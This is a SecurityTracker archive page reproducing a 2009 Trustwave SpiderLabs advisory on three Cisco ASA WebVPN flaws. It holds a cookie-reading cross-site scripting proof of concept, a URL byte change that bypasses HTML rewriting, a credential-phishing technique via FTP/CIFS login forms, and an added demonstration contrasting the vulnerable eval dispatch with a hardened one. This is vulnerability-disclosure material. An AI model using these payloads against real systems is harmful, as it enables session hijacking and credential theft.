SecurityTracker.com
SecurityTracker Archives

Category:   Device (Firewall)  >   Cisco ASA Vendors:   Cisco
Cisco ASA Bugs Permit Cross-Site Scripting and HTML Injection Attacks
SecurityTracker Alert ID:  1022457
SecurityTracker URL:  http://securitytracker.com/id/1022457
CVE Reference:   CVE-2009-1201, CVE-2009-1202, CVE-2009-1203   (Links to External Site)
Date:  Jun 25 2009
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 8.0(4), 8.1.2, and 8.2.1
Description:   Some vulnerabilities were reported in Cisco ASA. A remote user can conduct cross-site scripting and HTML injection attacks. A remote user may be able to obtain the target user's authentication credentials in certain cases.

A remote user can create specially crafted HTML that rewrites the "CSCO_WebVPN['process']" parameter with a function that will return arbitrary code [CVE-2009-1201]. Then, when the "csco_wrap_js" function is next called, the arbitrary code will be executed by the target user's browser. The code will originate from the ASA WebVPN site and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Cisco has assigned Cisco Bug ID CSCsy80694 to this vulnerability.

A demonstration exploit is provided:

<html><script>
function a(b, c)
{
return "alert('Your VPN location:\\n\\n'+" +
"document.location+'\\n\\n\\n\\n\\n" +
"Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>

A remote user can create a specially crafted request that, when loaded by the target user, will cause arbitrary HTML to be rendered in the ASA's DOM, permitting cross-site scripting attacks [CVE-2009-1202].

Cisco has assigned Cisco Bug ID CSCsy80705 to this vulnerability.

The device does not sufficiently differentiate the WebVPN login screen from login screens generated when the target user attempts to access an FTP or CIFS server [CVE-2009-1203]. A user may inadvertently send their WebVPN authentication credentials to an FTP or CIFS server.

Cisco has assigned Cisco Bug ID CSCsy80709 to this vulnerability.

The vendor was notified on March 31, 2009.

David Byrne of Trustwave's SpiderLabs reported these vulnerabilities.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the Cisco ASA WebVPN device, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user may be able to obtain the target user's authentication credentials in certain cases.

Solution:   The vendor has issued a fix (8.0.4.34, 8.1.2.25).
Vendor URL:  www.cisco.com/ (Links to External Site)
Cause:   Input validation error, State error

Message History:   None.


 Source Message Contents

Subject:  Trustwave's SpiderLabs Security Advisory TWSL2009-002

Trustwave's SpiderLabs Security Advisory TWSL2009-002: 
Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24 Version: 1.0

Vendor: Cisco Systems, Inc. (http://www.cisco.com)

Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description: Cisco's Adaptive Security Appliance (ASA)
provides a number of security related features, including
"Web VPN" functionality that allows authenticated users to
access a variety of content through a web interface. This
includes other web content, FTP servers, and CIFS file
servers.

The web content is proxied by the ASA and rewritten so that
any URLs in the web content are passed as query parameters
sent to the ASA web interface. Where scripting content is
present, the ASA places a JavaScript wrapper around the
original webpage's Document Object Model (DOM), to prevent
the webpage from accessing the ASA's DOM.

Credit: David Byrne of Trustwave's SpiderLabs


Finding 1: Post-Authentication Cross-Site Scripting
CVE: CVE-2009-1201
The ASA's DOM wrapper can be rewritten in a manner to allow
Cross-Site Scripting (XSS) attacks. For example, the
"csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes
a call to a function referenced by "CSCO_WebVPN['process']".
The result of this call is then used in an "eval" statement.

function csco_wrap_js(str)
{
   var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
           "/+CSCOL+/cte.js></scr"+
           "ipt><script id=CSCO_GHOST src="+
           CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
   var js_mangled=CSCO_WebVPN['process']('js',str);
   ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
   return ret;
};

To exploit this behavior, a malicious page can rewrite
"CSCO_WebVPN['process']" with an attacker-defined function
that will return an arbitrary value. The next time the
"csco_wrap_js" function is called, the malicious code will
be executed. Below is a proof of concept.

<html><script>
function a(b, c)
{
   return "alert('Your VPN location:\\n\\n'+" +
   "document.location+'\\n\\n\\n\\n\\n" +
   "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>
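The following is an added example, not Cisco's code and not part of the advisory: a reduced Node.js model of the csco_wrap_js pattern described above (dispatching through a writable global object and then eval()ing whatever the callee returns), placed next to a hardened shape that binds the processor once and freezes the namespace. The names trustedProcess, attackerProcess, attackerRan and makeHardenedWrapper are constructed for this demonstration and do not correspond to anything on the ASA.

```javascript
// Added example (not Cisco's code): model of a wrapper that dispatches
// through a mutable global and evals the callee's return value, next to a
// hardened shape that binds the processor at setup time.

// The gateway's legitimate processor (constructed stand-in): for "js" it
// returns a JSON string literal, so eval of it yields plain data, never
// code; for "html" it escapes angle brackets.
function trustedProcess(kind, str) {
  if (kind === "js") return JSON.stringify(String(str));
  return String(str).replace(/</g, "&lt;");
}

// Attacker-supplied replacement, modelled on the advisory's proof of
// concept: it returns JavaScript source instead of data, so the wrapper's
// eval executes it. attackerRan stands in for the cookie-reading alert.
const attackerRan = { value: false };
function attackerProcess(kind, str) {
  return "attackerRan.value = true; 'pwned'";
}

// --- Vulnerable shape: the processor is looked up on a mutable namespace
// object at every call, so any script in the same realm can redirect it.
const CSCO_WebVPN = { process: trustedProcess };

function wrapVulnerable(str) {
  const jsMangled = CSCO_WebVPN["process"]("js", str);
  return CSCO_WebVPN["process"]("html", eval(jsMangled));
}

// --- Hardened shape: capture the processor when the wrapper is built and
// freeze the namespace, so a later reassignment is ignored (or throws in
// strict mode) instead of changing what gets evaluated.
function makeHardenedWrapper(namespace) {
  const processor = namespace.process;   // bound once, cannot be redirected
  Object.freeze(namespace);
  return function wrapHardened(str) {
    const jsMangled = processor("js", str);
    return processor("html", eval(jsMangled));
  };
}

// A page script overwrites the dispatch point, then the wrapper is called:
// the attacker's string is evaluated and attackerRan flips to true.
function demoVulnerable() {
  attackerRan.value = false;
  CSCO_WebVPN["process"] = attackerProcess;
  const out = wrapVulnerable("<b>x</b>");
  return { attackerRan: attackerRan.value, out };
}

// Same attempt against the hardened wrapper: the frozen namespace keeps the
// trusted processor and only escaped markup comes back.
function demoHardened() {
  attackerRan.value = false;
  const ns = { process: trustedProcess };
  const wrap = makeHardenedWrapper(ns);
  try { ns.process = attackerProcess; } catch (e) { /* TypeError in strict mode */ }
  const out = wrap("<b>x</b>");
  return { attackerRan: attackerRan.value, redirected: ns.process !== trustedProcess, out };
}
```

The design point is that the dispatch target must not be reachable from code running in the same realm; binding it in a closure and freezing the namespace removes the overwrite, while the eval over processor output remains something to avoid in any wrapper design.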

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80694.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202
When a webpage is requested through the ASA's Web VPN, the
targeted scheme and hostname are Rot13-encoded, then
hex-encoded and placed in the ASA's URL. For example,
"http://www.trustwave.com" is accessed by requesting the
following ASA path:

/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/

The HTML content returned for this request is visibly
reformatted by the ASA, starting at the very beginning:

      <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the
initial hex value of "00" to "01", the HTML document is
returned without any rewriting. This allows the page's
scriptable content to run in the ASA's DOM, making
Cross-Site Scripting trivial.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80705.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203
When a user accesses an FTP or CIFS destination using the
Web VPN, the resulting URL is formatted in a similar manner
as the web requests described above. The following URL
attempts to connect to ftp.example.com; normally, it would
be in an HTML frame within the Web VPN website.

      
/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F736763
2e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS
share using anonymous credentials. If those fail, the user
is prompted for login credentials. When viewed on its own
(outside of a frame), the submission form gives no
indication what it is for and is very similar in appearance
to the Web VPN's primary login page. If the URL was sent to
a user by an attacker, it is very possible that a user would
assume that he needs to resubmit credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's
FTP or CIFS server.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80709.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Vendor Communication Timeline:
03/31/09 - Cisco notified of vulnerabilities
06/24/09 - Cisco software updates released; Advisory
           released

Remediation Steps: Install updated software from Cisco.


Revision History: 1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and
subscription-based information security and payment card
industry compliance management solutions to businesses and
government entities throughout the world. For organizations
faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with
comprehensive solutions that include its flagship
TrustKeeper compliance management software and other
proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500
businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their
network infrastructure, data communications and critical
information assets. Trustwave is headquartered in Chicago
with offices throughout North America, South America,
Europe, Africa, China and Australia. For more information,
visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave
responsible for incident response and forensics, ethical
hacking and application security tests for Trustwave's
clients. SpiderLabs has responded to hundreds of security
incidents, performed thousands of ethical hacking exercises
and tested the security of hundreds of business applications
for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as
is" without warranty of any kind. Trustwave disclaims all
warranties, either express or implied, including the
warranties of merchantability and fitness for a particular
purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business
profits or special damages, even if Trustwave or its
suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or
limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.


Copyright 2019, SecurityGlobal.net LLC